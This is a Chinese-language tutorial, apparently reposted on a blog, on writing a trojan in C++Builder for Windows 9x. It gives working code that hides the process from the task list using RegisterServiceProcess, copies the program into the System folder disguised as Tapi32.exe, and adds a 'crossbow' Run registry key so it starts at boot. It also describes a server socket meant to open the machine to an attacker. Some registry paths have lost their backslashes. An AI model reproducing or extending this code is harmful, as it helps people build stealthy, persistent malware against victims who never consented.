木马是如何编写的

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈――难道你还给受害者传一个1兆多的动态链接库――Msvbvm60.dll吗? 

  启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 
  Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
  我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。 
  首先判断目标机的操作系统是Win9x还是WinNt: 


DWORD dwVersion = GetVersion(); 

// 得到操作系统的版本号 

if (dwVersion >= 0x80000000) 

// 操作系统是Win9x,不是WinNt 

  { 

   typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD); 

     //定义RegisterServiceProcess()函数的原型 

     HINSTANCE hDLL; 

    LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; 

    hDLL = LoadLibrary("KERNEL32"); 

    //加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL 

   lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess"); 

     //得到RegisterServiceProcess()函数的地址 

     lpRegisterServiceProcess(GetCurrentProcessId(),1); 

    //执行RegisterServiceProcess()函数,隐藏本进程 

    FreeLibrary(hDLL); 

    //卸载动态链接库 

  } 

  这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。 
接着再将自己拷贝一份到%System%目录下,例如:C:WindowsSystem,并修改注册表,以便启动时自动加载:
{  

char TempPath[MAX_PATH]; 

//定义一个变量 

GetSystemDirectory(TempPath ,MAX_PATH); 

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径 

SystemPath=AnsiString(TempPath); 

//格式化TempPath字符串,使之成为能供编译器使用的样式 

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"Tapi32.exe").c_str() ,FALSE); 

//将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来 

Registry=new TRegistry; 

//定义一个TRegistry对象,准备修改注册表,这一步必不可少 

Registry->RootKey=HKEY_LOCAL_MACHINE; 

//设置主键为HKEY_LOCAL_MACHINE 

Registry->OpenKey("SoftwareMicrosoftWindows 

CurrentVersionRun",TRUE); 

//打开键值SoftwareMicrosoftWindowsCurrentVersionRun,如果不存在,就创建之 

try 

  { 

   //如果以下语句发生异常,跳至catch,以避免程序崩溃 

   if(Registry->ReadString("crossbow")!=SystemPath+"Tapi32.exe") 

    Registry->WriteString("crossbow",SystemPath+"Tapi32.exe"); 

    //查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe 

    //如果不是,就写入以上键值和内容 

  } 

catch(...) 

  { 

  //如果有错误,什么也不做 

  } 

}

你可能感兴趣的:(职场,休闲,木马)